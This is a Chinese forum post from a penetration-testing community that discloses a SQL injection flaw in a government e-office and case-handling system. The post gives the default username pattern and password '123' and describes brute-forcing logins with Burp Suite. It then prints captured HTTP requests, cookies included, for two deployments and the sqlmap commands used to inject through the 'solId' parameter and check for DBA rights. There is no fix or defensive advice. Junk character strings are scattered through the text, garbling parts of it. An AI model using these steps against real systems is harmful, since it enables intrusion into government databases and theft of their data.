. F1 v! @9 O4 K" V
3 G% |' q C1 p 平台简介:( |9 t1 L0 a9 ~# L0 x
0 W7 O5 M- G2 L! T/ R |2 [$ w/ _0 y- x z2 D
6 t- v) z. N& C) h& r- h7 B" k2 I
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!9 V9 p; [ T# U* `3 F
. g4 m* {, I1 e2 G }: Q ) P9 m1 z$ V; G5 u. v" w. U- z0 b2 ]
7 P- F6 B7 U* Y2 Y2 A2 M, v, Q, F7 [ 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
2 H0 {4 _7 s7 ~
9 P4 ^9 L1 z5 R4 I3 F6 S' } http://1.1.1.1:7197/cap-aco/#(案例2-)
, p8 F5 ~* `$ [* s2 i http://www.XXOO.com (案例1-官网网站)8 `; ?4 d N3 _ J6 ?7 C8 e
漏洞详情:' n7 d' w; F- f
; V, w; |/ t0 W: ~% i3 L7 B6 U 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试, r) |( O; N) V1 s- g
+ f9 ^+ O! Z/ g |; r% u J 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:* b+ i6 ?4 r5 B8 c( j% {" I) x
) F* W* ~. L! ?$ G9 J# C . e) X* S3 Z8 }& {& ^/ B0 I
6 d# e; ~ N( H5 Y2 E& ]. Z. Z& v, g% D8 L- n' f, g0 | 1 I2 [6 a r3 h: T
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
( Q- f4 p: y) ]4 X# ~ 1、案例1-官方网站1 ? d& X& e) M5 C) t0 h% ^
2 \ t5 T4 j7 C9 V& C GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
www.XXOO.com( j% Y5 p: v7 M1 D- `
Host:Proxy-Connection: Keep-Alive
Accept: application/json, text/javascript, */*; q=0.01
7 r6 b- c5 W1 U# Q% E1 j9 l Accept-Language: zh-CN0 R0 J, t* L5 q
: |* p! P- g! S- E) r. A: X/ J Content-Type: application/json! R. v1 P. r0 f. u( H
0 `5 g% Q @5 J- e User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
; F K' E5 U+ q- H2 _6 {% A# W1 K3 e1 ]! J7 t5 k X-Requested-With: XMLHttpRequest
http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
Referer:/ [7 p' x; }) i ~5 v5 p4 N6 y) Z Accept-Encoding: gzip, deflate, sdch
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e9 ^5 ~- x: d* p. T9 w5 P( E7 ~
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
5 \; l5 | U3 v9 R: | ( L$ Q. k$ Q6 m4 [
# h; L0 m0 x2 f* d. f" t4 c
, G5 Q3 R* p! Z: r. M 6 C; q3 B8 U! e/ Y5 W
, e6 G2 t/ A. t/ W" |! v+ _% ]6 V
7 p5 C! `, ?" t) G4 N8 U# G$ L. W% e
0 `4 I7 b& ~( q 2、案例2-某天河云平台' A+ B. r, n3 K& j
/ w2 p' ]- _8 k, Y GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
J. s0 v+ u2 x3 b8 ?" F" T& w9 w$ f Host: 1.1.1.:7197
' F0 x& y5 `" N, L8 H8 G Accept: application/json, text/javascript, */*; q=0.01
6 Z/ y C9 u! o1 H# M6 f6 ]$ d9 h X-Requested-With: XMLHttpRequest
( \% t, | U- @7 I2 ?User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
7 {' P$ K% r# I' j# K& G0 ` Content-Type: application/json+ U2 h& ]% ?# o6 G
" B6 q' ~, }2 {5 B- _0 R( |. J Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
- D8 e, W9 k* M4 J7 b Accept-Language: zh-CN,zh;q=0.8
7 ^: p- @, G+ V# C' Q5 ?2 b Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
9 x: V- a; Y1 ~2 m2 b9 U' _8 | dConnection: close) V$ v$ Q& F, @* ^1 f
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
, {* s9 S! A1 ?8 X0 {
$ u5 L8 z% h# C" b4 y5 ?7 L
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |